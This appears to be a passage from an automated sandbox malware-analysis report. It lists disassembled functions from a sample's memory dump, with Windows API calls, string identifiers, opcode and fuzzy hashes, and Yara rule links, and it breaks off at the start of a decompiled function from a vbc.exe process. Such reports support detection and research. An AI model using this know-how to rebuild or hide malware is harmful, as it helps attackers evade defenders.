                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                  • Opcode ID: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                  • Instruction ID: a5b74f8db5ede7a3d830d9ef30c1a68d0a9fd07d2d047c5f1f3455979569a65d
                                                                                                                                                                  • Opcode Fuzzy Hash: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF08231680710BBE751AF68BC06F467A90A786B93F200427F700A51E2D2F98591CB9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404C2D, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C44
                                                                                                                                                                    • Part of subcall function 0041473D: LoadLibraryW.KERNEL32(shlwapi.dll,73FB48C0,?,00404C4C,00000000), ref: 00414746
                                                                                                                                                                    • Part of subcall function 0041473D: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
                                                                                                                                                                    • Part of subcall function 0041473D: FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C56
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C68
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C7A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2406072140-0
                                                                                                                                                                  • Opcode ID: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                  • Instruction ID: 228af19f1fcbab99cdef25afc198749965fa335a60b9bcf03d324973c33eddf9
                                                                                                                                                                  • Opcode Fuzzy Hash: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                  • Instruction Fuzzy Hash: C1F01CB54047016BDA313F72CC09D5BBAADEFC1318F020D3EB1A1661E1CBBD94428A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CF98, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040CFDA
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040CFE8
                                                                                                                                                                    • Part of subcall function 00408FA6: wcslen.MSVCRT ref: 00408FC2
                                                                                                                                                                    • Part of subcall function 00408FA6: memcpy.MSVCRT ref: 00408FE5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                  • Opcode ID: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                  • Instruction ID: cb92cf76e860540842cf0149dc84745c0fdf0d5674f0ab6313b6b46cd67416c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5331B371904104EFDF10EFA5D8419EEB7B5EF44328F20416FE854B71C2DB7C9A468A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408BAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcschr
                                                                                                                                                                  • String ID: ZD
                                                                                                                                                                  • API String ID: 2424118378-3587482827
                                                                                                                                                                  • Opcode ID: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
                                                                                                                                                                  • Instruction ID: bc5ff3c8a32915e0c271f67cda952c5327785ed0a9ceb032124e0645629a4555
                                                                                                                                                                  • Opcode Fuzzy Hash: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21D372815615AFEB259F18C6809BA73B4EB55354B10003FECC1E73D1EF78EC9186A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A19F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                  • _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                  • String ID: URL
                                                                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                                                                  • Opcode ID: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                  • Instruction ID: 99369b2f7b4a62638f95efb923bbf95607b210eae314fb40be60fbcdcdd136bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11E371200304BBEB11DF65CC05F5F7BA8AF91348F00407AF904AB391EA39DA20C7A6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004089E1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                  • Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                  • Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
                                                                                                                                                                  • Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                  • Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004174E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00417524
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFileHandleUnmapView
                                                                                                                                                                  • String ID: NA
                                                                                                                                                                  • API String ID: 2381555830-2562218444
                                                                                                                                                                  • Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                  • Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
                                                                                                                                                                  • Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AE5E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                    • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 0040907D
                                                                                                                                                                    • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 004090A2
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                    • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                  • String ID: {@
                                                                                                                                                                  • API String ID: 2445788494-1579578673
                                                                                                                                                                  • Opcode ID: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                  • Instruction ID: c5e992bc26eaba96ccce0a59eaf6c8ec24c3530ff69697df2342695e73c728e4
                                                                                                                                                                  • Opcode Fuzzy Hash: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                  • Instruction Fuzzy Hash: A1113376804208AFCB01AF69DC45CDA7B78EE05364751C27BF515A7192D6349E04CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D1F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                                                                  • Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                  • Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
                                                                                                                                                                  • Opcode Fuzzy Hash: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408907, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameSavewcscpy
                                                                                                                                                                  • String ID: X
                                                                                                                                                                  • API String ID: 3080202770-3081909835
                                                                                                                                                                  • Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                  • Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
                                                                                                                                                                  • Opcode Fuzzy Hash: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408FFD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                                                                  • String ID: History
                                                                                                                                                                  • API String ID: 1872909662-3892791767
                                                                                                                                                                  • Opcode ID: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                  • Instruction ID: 6d3e5e79fb5ba3dc045185e0f7d8bb4044f56437cf7f7bc11c2c4fdfd27bba80
                                                                                                                                                                  • Opcode Fuzzy Hash: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                  • Instruction Fuzzy Hash: D1F0A4721086019BD210EA298841A6BF7E8DB923A8F11053FF89192283DB3DDC5586A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BF8E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040BFA6
                                                                                                                                                                  • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040BFD5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 568519121-123907689
                                                                                                                                                                  • Opcode ID: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                  • Instruction ID: 52ec7358bf223f21f0f54ed804b07356b6d9a4f052c0f3137058475af9765f6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                  • Instruction Fuzzy Hash: 66016D75900206ABDB209F5ACC45EAFB7F8FF85745F00802AE855E7281E7349945CF79
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004018F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
                                                                                                                                                                  • memset.MSVCRT ref: 00401930
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                                                                  • String ID: WinPos
                                                                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                                                                  • Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                  • Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
                                                                                                                                                                  • Opcode Fuzzy Hash: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BC29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040BC4D
                                                                                                                                                                  • LoadStringW.USER32(X1E,00000000,?,00001000), ref: 0040BC65
                                                                                                                                                                    • Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
                                                                                                                                                                    • Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$LoadString_itow
                                                                                                                                                                  • String ID: X1E
                                                                                                                                                                  • API String ID: 2363904170-1560614071
                                                                                                                                                                  • Opcode ID: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
                                                                                                                                                                  • Instruction ID: f380a03a7eecdd41986674abf89776040d4e37bafc66abb46cfa381fa5204df8
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
                                                                                                                                                                  • Instruction Fuzzy Hash: 71F082729013286AF720AB459D4AFDB776CDF05744F00007ABB08E5192DB349A40C7ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B93B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040B94E
                                                                                                                                                                  • _itow.MSVCRT ref: 0040B95C
                                                                                                                                                                    • Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
                                                                                                                                                                    • Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32(00453158,?,0044552C,?,00001000,00452F48), ref: 0040B90F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$PrivateProfileString_itow
                                                                                                                                                                  • String ID: X1E
                                                                                                                                                                  • API String ID: 1482724422-1560614071
                                                                                                                                                                  • Opcode ID: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
                                                                                                                                                                  • Instruction ID: c527bd8864a1e8dc9924cbacd4c6e7ae812da0d58d0774c54ed9ac8dc2116314
                                                                                                                                                                  • Opcode Fuzzy Hash: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
                                                                                                                                                                  • Instruction Fuzzy Hash: EDE0BFB294021CB6EF11BFA1CC46F9D77ACBB14748F004025FA05A51D1E7B8E6598759
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BE89, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040BE92
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040BEA8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                                                                  • Opcode ID: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
                                                                                                                                                                  • Instruction ID: 84d8fe8025816c60ed5f34aa0efad718bb16e503e766276e22ad5a10aaf03d01
                                                                                                                                                                  • Opcode Fuzzy Hash: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
                                                                                                                                                                  • Instruction Fuzzy Hash: EDC01262586A20A4F622B622AE03B8A02888F52308F25006FFD00341C2EFAC561180EE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042B269, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                  • Opcode ID: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
                                                                                                                                                                  • Instruction ID: 5583aac8f3c8c6829f169dedbb5c7f3bc80267d871db847419cec400d03eb5c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
                                                                                                                                                                  • Instruction Fuzzy Hash: A551B375A00215EBDF14DF55D882BAEBB75FF04340F54805AED04A6252E7789E50CBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C05B, Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                  • Opcode ID: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
                                                                                                                                                                  • Instruction ID: 98264c0c01cbe32efcdb0ac77575e239005db210b2699cda7c9871cbaaee01ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21B5B0A11700CFD7518F6A8485A16FAE8FF95310B26C9AFD159DB6B2D7B8C440CF14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408DC5, Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                    • Part of subcall function 004080AC: malloc.MSVCRT ref: 004080C8
                                                                                                                                                                    • Part of subcall function 004080AC: memcpy.MSVCRT ref: 004080E0
                                                                                                                                                                    • Part of subcall function 004080AC: free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                  • memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                  • Opcode ID: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                  • Instruction ID: da9404a03362d95f45f68813529404a67aab342ff110b4c830d245a8fa10e0ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B214F71100604EFD730DF18D98199AB3F5FF853247118A2EF8A69B6E1CB39A915CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416CFF, Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,0041767E,?,?,0041767E,00417A93,00000000,?,00417D00,?,00000000), ref: 00416D1A
                                                                                                                                                                  • malloc.MSVCRT ref: 00416D22
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D39
                                                                                                                                                                  • free.MSVCRT(00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D40
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                  • Opcode ID: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
                                                                                                                                                                  • Instruction ID: b9117e17fd0dd3e97e5004a4b09ed95055046f94a1a1b3665f6ad504cf0e37ce
                                                                                                                                                                  • Opcode Fuzzy Hash: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0377620521E7BE6102565AC40E77779CEB86276B21072BBD10E65D1ED59EC0046B4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Analysis Process: vbc.exe PID: 6168 Parent PID: 2960 vbc.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 004073B6, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004073B6(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
